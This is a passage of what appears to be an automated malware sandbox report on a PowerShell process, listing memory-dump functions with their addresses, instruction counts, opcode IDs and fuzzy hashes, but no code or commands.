                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0326A238 Relevance: .1, Instructions: 54COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.821609911.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_3260000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: dee5738e646ecd4e7a8092fad56bf036eb0b799e19c0050a1631c42f8c6e4a5a
                    • Instruction ID: 8ca4a4cd118f16bdd29cd814a7d0904e65112b7cd9310e48a90c55188c64c55e
                    • Opcode Fuzzy Hash: dee5738e646ecd4e7a8092fad56bf036eb0b799e19c0050a1631c42f8c6e4a5a
                    • Instruction Fuzzy Hash: EB0121B7B041100B4B20EABE788802FA78BDFE02703198237E706C7394EE32CC818361
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0326C650 Relevance: .1, Instructions: 53COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.821609911.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_3260000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b9ec6a97e37b8a2d15b110ee30ef9113a846fc02da1ec6d2b99c046a353b0bde
                    • Instruction ID: fb6fa61a473633276bee37ecb4ac4c77ef4c8c4cb4da11706d1eab0131a2971c
                    • Opcode Fuzzy Hash: b9ec6a97e37b8a2d15b110ee30ef9113a846fc02da1ec6d2b99c046a353b0bde
                    • Instruction Fuzzy Hash: B80161357105218F8714EF29E49892EBBEAFFCA651714807AE10AC7365DF75DC40CB54
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 032BA3A8 Relevance: .1, Instructions: 53COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.822026660.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_32b0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 29388243894b1d9fd32c3432ab30faec8a1a0822280ef1d867229cf1c92bcf55
                    • Instruction ID: fe47d341a7b6eceaf9e9a50e556bb6626a1e97548a6e7b560a407b9fde634f30
                    • Opcode Fuzzy Hash: 29388243894b1d9fd32c3432ab30faec8a1a0822280ef1d867229cf1c92bcf55
                    • Instruction Fuzzy Hash: 7E01D2313482844FD701D779E4589A87BB5DFC736931980EAD40DCB262DA26CC02C761
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 032612A8 Relevance: .0, Instructions: 50COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.821609911.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_3260000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 14a0f9471834713b6fa0999a79dba7e5157792568187d515dbdf5c503332fb0f
                    • Instruction ID: fc1b1163a0e06cd16cc810a248ad9ecc17038b779c9de5ceb34ffcd45b190e7e
                    • Opcode Fuzzy Hash: 14a0f9471834713b6fa0999a79dba7e5157792568187d515dbdf5c503332fb0f
                    • Instruction Fuzzy Hash: 1001CC743107549FC728EB65E984A2B77FAFB88216B00842DE543C7B41CB35F8468B50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0338D01D Relevance: .0, Instructions: 45COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.822683341.000000000338D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0338D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_338d000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8df3e911ffee82bf07fc369ed6f0e6a75c7d194694c435dc2763cd4838a108fd
                    • Instruction ID: b291e4335ac97c88e13872cc2d986226450bcf9d28829606530e901da3730769
                    • Opcode Fuzzy Hash: 8df3e911ffee82bf07fc369ed6f0e6a75c7d194694c435dc2763cd4838a108fd
                    • Instruction Fuzzy Hash: 5501F7B04083449AD710DB26DCC4B66FB9CEF41668F0C805AED445B6C6C3BD9945C6B2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0326A228 Relevance: .0, Instructions: 44COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.821609911.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_3260000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 07d03244f7741ecc868481f7b93e2ff0c014a5e1cb373e29b4017c60c8abf887
                    • Instruction ID: 77ee09b0ce3f7e0f13d10179f77e1134b0da169a7c601fe521f915df5c77e7d7
                    • Opcode Fuzzy Hash: 07d03244f7741ecc868481f7b93e2ff0c014a5e1cb373e29b4017c60c8abf887
                    • Instruction Fuzzy Hash: 98F0F0BB7182401F8712AB7978584AEBF9ADFE217030AC067E606CB755DD258C829771
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 032BA438 Relevance: .0, Instructions: 44COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.822026660.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_32b0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f46089799dac04caf2a7ca36ab22d17ab90ce6fdba014c0847681a0744fcf470
                    • Instruction ID: ef34dae2df8645ab21178ce1eeda4851aee0a44dc2beba96952eabb6952ddf44
                    • Opcode Fuzzy Hash: f46089799dac04caf2a7ca36ab22d17ab90ce6fdba014c0847681a0744fcf470
                    • Instruction Fuzzy Hash: 34012970E002599BDB18DFB9D458BDEBBF6AB8C300F148169D405B7384DB759985CFA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0338D007 Relevance: .0, Instructions: 44COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.822683341.000000000338D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0338D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_338d000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: fb372c59dfd3720a3f18c8aae26bcd4144e6aff7ef2c306773ceefd4ee379490
                    • Instruction ID: 90084386b7bc12acd783426e003052b1c9327dc3d4e238c876a7332973bd4363
                    • Opcode Fuzzy Hash: fb372c59dfd3720a3f18c8aae26bcd4144e6aff7ef2c306773ceefd4ee379490
                    • Instruction Fuzzy Hash: E4014C6140D3C09ED7128B25CC94B62BFB4EF47624F0D81CBD9848F2E7C2699848CBB2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0326C858 Relevance: .0, Instructions: 41COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.821609911.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_3260000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 236b88a5a4c3ed794b01f7243d83b60626d79a7eeb5a86a2571ac66ddad6fa54
                    • Instruction ID: 857960f7e9241d50f93e54b42d3e912fb45c8d2e171a58dfc0f3a1093a3416c3
                    • Opcode Fuzzy Hash: 236b88a5a4c3ed794b01f7243d83b60626d79a7eeb5a86a2571ac66ddad6fa54
                    • Instruction Fuzzy Hash: 19F0A73674422557D728A66EF858B6BB39EEFC4625F24807AF20DCB391DD61DC8102A1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 032635F0 Relevance: .0, Instructions: 38COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.821609911.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_3260000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 738b03a2b2b5d3a12440160f0183adc8414dc3ab9f4a6898074d07c3d39ebaaf
                    • Instruction ID: 89a76abb29274d92300dc2e616a96a9ffe3706d22da6175d15f117579548a07c
                    • Opcode Fuzzy Hash: 738b03a2b2b5d3a12440160f0183adc8414dc3ab9f4a6898074d07c3d39ebaaf
                    • Instruction Fuzzy Hash: 7DF0F631B103585BEF24CB61DC557DABB79EF84710F0040ADD609A3286DB7168988B95
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 032BE108 Relevance: .0, Instructions: 30COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.822026660.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_32b0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a5bfeca0f9bf5a9151c2c6327d5ec6e21d7c3491741d3ad159015550a55bb669
                    • Instruction ID: c32138e924ed539f807ad8e88f83b4ef993a41f11b988e32377c7fdf2323a41b
                    • Opcode Fuzzy Hash: a5bfeca0f9bf5a9151c2c6327d5ec6e21d7c3491741d3ad159015550a55bb669
                    • Instruction Fuzzy Hash: B601F635A01118DFDB04EB90F498BDCBBB2FB88321F109025E50567384CB31AD91CF50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0326BA68 Relevance: .0, Instructions: 26COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.821609911.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_3260000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: be62012ce4f36bf9a73bdbe3c0c10bb1887f255c338a4f11ffd13929d4540ae7
                    • Instruction ID: 4b806b30c673b60237552c94d6b13910dd92f6eec5065ab2e3a2a4818c92a858
                    • Opcode Fuzzy Hash: be62012ce4f36bf9a73bdbe3c0c10bb1887f255c338a4f11ffd13929d4540ae7
                    • Instruction Fuzzy Hash: 2CE0DF327102014F8320AF5EF488C2BBBEAABC8631309806AE10DC3315CAA0DC89C790
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 032B52F0 Relevance: .0, Instructions: 25COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.822026660.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_32b0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 107b8e5dea7235c01124e3f13039ae7579fdacc7c65d95bb01d6893af2b7a64d
                    • Instruction ID: cbd50a92171ce485e81fde14721f3152316af642af7453ba9eaf7203ed969046
                    • Opcode Fuzzy Hash: 107b8e5dea7235c01124e3f13039ae7579fdacc7c65d95bb01d6893af2b7a64d
                    • Instruction Fuzzy Hash: F0E09275A05248DFCB05DFB0EA2429D7BB2DB46204F1288EBC04ADB698DF301F06D762
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 032B5300 Relevance: .0, Instructions: 19COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.822026660.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_32b0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0473ba18291041954cd5a9de5d7a1f39f8cf751423cac3a19e72a5fc19265173
                    • Instruction ID: 2002dda31260b33202a46b8c92105f23fadb2f8cea3b34a2710a15aed9f9c243
                    • Opcode Fuzzy Hash: 0473ba18291041954cd5a9de5d7a1f39f8cf751423cac3a19e72a5fc19265173
                    • Instruction Fuzzy Hash: E1E0E674A0520CDFC704EFA4E55065E77B6DB45204F1148A8C549D7394DF351E0197A1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0326C313 Relevance: .0, Instructions: 9COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.821609911.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_3260000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 840d9c188f4e5d3e5200d634cac027f46e45ae9f2da83a42c26783f7e373cca9
                    • Instruction ID: e1a4ca5709d6e0aa1ea520c136f82064b316def7f4b66e9bf120e4e5ed886631
                    • Opcode Fuzzy Hash: 840d9c188f4e5d3e5200d634cac027f46e45ae9f2da83a42c26783f7e373cca9
                    • Instruction Fuzzy Hash: CEB012333140208705083349704806CF366EAD00763104033E10BC0058CA5108D30254
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions

                    Function 03268F48 Relevance: .1, Instructions: 99COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.821609911.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_3260000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: db0a9fb0e8ac362cfc4c36e52b0c44120d24eb6a2d62396529d9efb2632c5efd
                    • Instruction ID: 3d9970987bb84678e9b14aaeb536bd4c6e8e1000dd64935ff9b1bedd45d0226a
                    • Opcode Fuzzy Hash: db0a9fb0e8ac362cfc4c36e52b0c44120d24eb6a2d62396529d9efb2632c5efd
                    • Instruction Fuzzy Hash: 794193B5E106258FDB10CF75C844A6FBBF6BF88350F068569D556E7350D770A980CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0326EAA0 Relevance: 5.3, Strings: 4, Instructions: 305COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.821609911.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_3260000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: DK1l$Xc1l$lj$lj
                    • API String ID: 0-2641367100
                    • Opcode ID: ba61949d9f4578b3276d86672d49c385208294a750cc5e2a41eb74249bfc7ca2
                    • Instruction ID: 5715401c64546f0bbc1b39cabc44db84ca9a97d5cb973479fd05a02faf50a25a
                    • Opcode Fuzzy Hash: ba61949d9f4578b3276d86672d49c385208294a750cc5e2a41eb74249bfc7ca2
                    • Instruction Fuzzy Hash: 49B18D79710205CFCB14DF39D59486EB7B6FF89214725C4AAD8069B365DB31EC82CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0326DFB0 Relevance: 5.2, Strings: 4, Instructions: 225COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.821609911.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_3260000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: DK1l$Xc1l$lj$lj
                    • API String ID: 0-2641367100
                    • Opcode ID: 40f75c060292b06ac40494337aa6af76ee994492d264196cad454edc7c6ee166
                    • Instruction ID: aae5be330390e4c38857ece08e6d850d6704bb279d7b32fec4b7e14d8805d456
                    • Opcode Fuzzy Hash: 40f75c060292b06ac40494337aa6af76ee994492d264196cad454edc7c6ee166
                    • Instruction Fuzzy Hash: C581B0347106018FC709DB39D59896EBBF6BFCA61472980AED40ADB765CB35DC82CB80
                    Uniqueness

                    Uniqueness Score: -1.00%